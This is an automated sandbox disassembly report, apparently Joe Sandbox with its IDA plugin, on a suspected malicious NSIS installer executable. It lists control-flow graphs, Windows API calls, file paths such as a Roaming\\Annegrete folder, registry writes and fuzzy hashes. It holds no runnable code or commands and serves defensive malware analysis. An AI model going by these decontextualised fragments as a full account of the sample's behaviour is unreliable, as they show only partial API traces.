                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000,00424248,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                                                                                                              • lstrlenA.KERNEL32(00403233,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000,00424248,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                                                                                                              • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00403233,00403233,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000,00424248,74DF23A0), ref: 0040527A
                                                                                                                                                              • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll), ref: 0040528C
                                                                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                                                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                                                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                              • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll
                                                                                                                                                              • API String ID: 2531174081-52913135
                                                                                                                                                              • Opcode ID: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                                                                                                                              • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                                                                                                                              • Opcode Fuzzy Hash: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                                                                                                                              • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 643 4030d8-4030ec 644 4030f5-4030fe 643->644 645 4030ee 643->645 646 403100 644->646 647 403107-40310c 644->647 645->644 646->647 648 40311c-403129 call 4032ea 647->648 649 40310e-403117 call 403300 647->649 653 4032d8 648->653 654 40312f-403133 648->654 649->648 655 4032da-4032db 653->655 656 403283-403285 654->656 657 403139-403182 GetTickCount 654->657 660 4032e3-4032e7 655->660 658 4032c5-4032c8 656->658 659 403287-40328a 656->659 661 4032e0 657->661 662 403188-403190 657->662 666 4032ca 658->666 667 4032cd-4032d6 call 4032ea 658->667 659->661 663 40328c 659->663 661->660 664 403192 662->664 665 403195-4031a3 call 4032ea 662->665 669 40328f-403295 663->669 664->665 665->653 677 4031a9-4031b2 665->677 666->667 667->653 675 4032dd 667->675 672 403297 669->672 673 403299-4032a7 call 4032ea 669->673 672->673 673->653 680 4032a9-4032b5 call 405d37 673->680 675->661 679 4031b8-4031d8 call 406625 677->679 685 40327b-40327d 679->685 686 4031de-4031f1 GetTickCount 679->686 687 4032b7-4032c1 680->687 688 40327f-403281 680->688 685->655 689 4031f3-4031fb 686->689 690 403236-403238 686->690 687->669 693 4032c3 687->693 688->655 694 403203-40322e MulDiv wsprintfA call 40521e 689->694 695 4031fd-403201 689->695 691 40323a-40323e 690->691 692 40326f-403273 690->692 697 403240-403247 call 405d37 691->697 698 403255-403260 691->698 692->662 699 403279 692->699 693->661 700 403233 694->700 695->690 695->694 703 40324c-40324e 697->703 702 403263-403267 698->702 699->661 700->690 702->679 704 40326d 702->704 703->688 705 403250-403253 703->705 704->661 705->702
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountTick$wsprintf
                                                                                                                                                              • String ID: ... %d%%$HBB
                                                                                                                                                              • API String ID: 551687249-372310663
                                                                                                                                                              • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                                                                                                              • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                                                                                                                              • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                                                                                                              • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(?), ref: 00401E38
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                                                                                                                              • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                              • String ID: Tahoma
                                                                                                                                                              • API String ID: 3808545654-3580928618
                                                                                                                                                              • Opcode ID: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                                                                                                                              • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                                                                                                                              • Opcode Fuzzy Hash: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                                                                                                                              • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 719 4056e4-40572f CreateDirectoryA 720 405731-405733 719->720 721 405735-405742 GetLastError 719->721 722 40575c-40575e 720->722 721->722 723 405744-405758 SetFileSecurityA 721->723 723->720 724 40575a GetLastError 723->724 724->722
                                                                                                                                                              APIs
                                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040573B
                                                                                                                                                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040575A
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\Desktop, xrefs: 004056E4
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                                              • API String ID: 3449924974-2028306314
                                                                                                                                                              • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                                                                                                              • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                                                                                                                              • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                                                                                                              • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 725 406492-4064b2 GetSystemDirectoryA 726 4064b4 725->726 727 4064b6-4064b8 725->727 726->727 728 4064c8-4064ca 727->728 729 4064ba-4064c2 727->729 730 4064cb-4064fd wsprintfA LoadLibraryExA 728->730 729->728 731 4064c4-4064c6 729->731 731->730
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                                                                                                              • wsprintfA.USER32 ref: 004064E2
                                                                                                                                                              • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                              • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                              • API String ID: 2200240437-4240819195
                                                                                                                                                              • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                                                                                                              • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                                                                                                                              • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                                                                                                              • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 732 405cbf-405cc9 733 405cca-405cf5 GetTickCount GetTempFileNameA 732->733 734 405d04-405d06 733->734 735 405cf7-405cf9 733->735 737 405cfe-405d01 734->737 735->733 736 405cfb 735->736 736->737
                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405CD3
                                                                                                                                                              • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                                                                                                                              Strings
                                                                                                                                                              • nsa, xrefs: 00405CCA
                                                                                                                                                              • "C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe", xrefs: 00405CBF
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                              • API String ID: 1716503409-296775785
                                                                                                                                                              • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                                                                                                              • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                                                                                                                              • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                                                                                                              • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 738 6f9516db-6f951717 call 6f951a98 742 6f951834-6f951836 738->742 743 6f95171d-6f951721 738->743 744 6f951723-6f951729 call 6f9522af 743->744 745 6f95172a-6f951737 call 6f9522f1 743->745 744->745 750 6f951767-6f95176e 745->750 751 6f951739-6f95173e 745->751 754 6f951770-6f95178c call 6f9524d8 call 6f951559 call 6f951266 GlobalFree 750->754 755 6f95178e-6f951792 750->755 752 6f951740-6f951741 751->752 753 6f951759-6f95175c 751->753 757 6f951743-6f951744 752->757 758 6f951749-6f95174a call 6f952a38 752->758 753->750 761 6f95175e-6f95175f call 6f952cc3 753->761 779 6f9517e3-6f9517e7 754->779 759 6f951794-6f9517da call 6f95156b call 6f9524d8 755->759 760 6f9517dc-6f9517e2 call 6f9524d8 755->760 763 6f951746-6f951747 757->763 764 6f951751-6f951757 call 6f9526b2 757->764 770 6f95174f 758->770 759->779 760->779 773 6f951764 761->773 763->750 763->758 778 6f951766 764->778 770->773 773->778 778->750 780 6f951824-6f95182b 779->780 781 6f9517e9-6f9517f7 call 6f95249e 779->781 780->742 786 6f95182d-6f95182e GlobalFree 780->786 788 6f95180f-6f951816 781->788 789 6f9517f9-6f9517fc 781->789 786->742 788->780 791 6f951818-6f951823 call 6f9514e2 788->791 789->788 790 6f9517fe-6f951806 789->790 790->788 792 6f951808-6f951809 FreeLibrary 790->792 791->780 792->788
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 6F951A98: GlobalFree.KERNEL32(?), ref: 6F951D09
                                                                                                                                                                • Part of subcall function 6F951A98: GlobalFree.KERNEL32(?), ref: 6F951D0E
                                                                                                                                                                • Part of subcall function 6F951A98: GlobalFree.KERNEL32(?), ref: 6F951D13
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F951786
                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 6F951809
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F95182E
                                                                                                                                                                • Part of subcall function 6F9522AF: GlobalAlloc.KERNEL32(00000040,?), ref: 6F9522E0
                                                                                                                                                                • Part of subcall function 6F9526B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F951757,00000000), ref: 6F952782
                                                                                                                                                                • Part of subcall function 6F95156B: wsprintfA.USER32 ref: 6F951599
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2314184359.000000006F951000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F950000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2314019695.000000006F950000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2314334219.000000006F953000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2314455683.000000006F955000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_6f950000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3962662361-3916222277
                                                                                                                                                              • Opcode ID: 0c97f88edbc9f02ac613ac037107dc24142ac6077f6d980ebea2b3075d8647cf
                                                                                                                                                              • Instruction ID: 39eac254a0bd4132afc943364ddae79b44c6d95bdbd41e405a87a606d3805a4b
                                                                                                                                                              • Opcode Fuzzy Hash: 0c97f88edbc9f02ac613ac037107dc24142ac6077f6d980ebea2b3075d8647cf
                                                                                                                                                              • Instruction Fuzzy Hash: BF418A711043089ADB04EF789984BDA37ACBF17328F148566E9159E1C3DB74E5F9CBA0
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp,00000023,00000011,00000002), ref: 004024C1
                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp,00000000,00000011,00000002), ref: 00402501
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseValuelstrlen
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp
                                                                                                                                                              • API String ID: 2655323295-1757623822
                                                                                                                                                              • Opcode ID: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                                                                                                                              • Instruction ID: f8068cdfa95035626473adca5f51816a5c1db3e2bbb00f719c7efdf62c59a762
                                                                                                                                                              • Opcode Fuzzy Hash: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                                                                                                                              • Instruction Fuzzy Hash: 12118171E00218AFEF10AFA59E89EAE7A74EB44314F20443BF505F71D1D6B99D419B28
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 004020C8
                                                                                                                                                                • Part of subcall function 0040521E: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000,00424248,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                                                                                                                • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000,00424248,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                                                                                                                • Part of subcall function 0040521E: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00403233,00403233,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000,00424248,74DF23A0), ref: 0040527A
                                                                                                                                                                • Part of subcall function 0040521E: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll), ref: 0040528C
                                                                                                                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                                                                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                                                                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                                                                                                              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 004020D8
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 00402152
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2987980305-0
                                                                                                                                                              • Opcode ID: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                                                                                                                              • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                                                                                                                              • Opcode Fuzzy Hash: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                                                                                                                              • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00405B28: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,?,00405B94,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                                                                                                                • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                                                                                                                • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                                                                                                              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                                                                                • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Annegrete,00000000,00000000,000000F0), ref: 0040163C
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Roaming\Annegrete, xrefs: 00401631
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                              • String ID: C:\Users\user\AppData\Roaming\Annegrete
                                                                                                                                                              • API String ID: 1892508949-3646369091
                                                                                                                                                              • Opcode ID: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                                                                                                                              • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
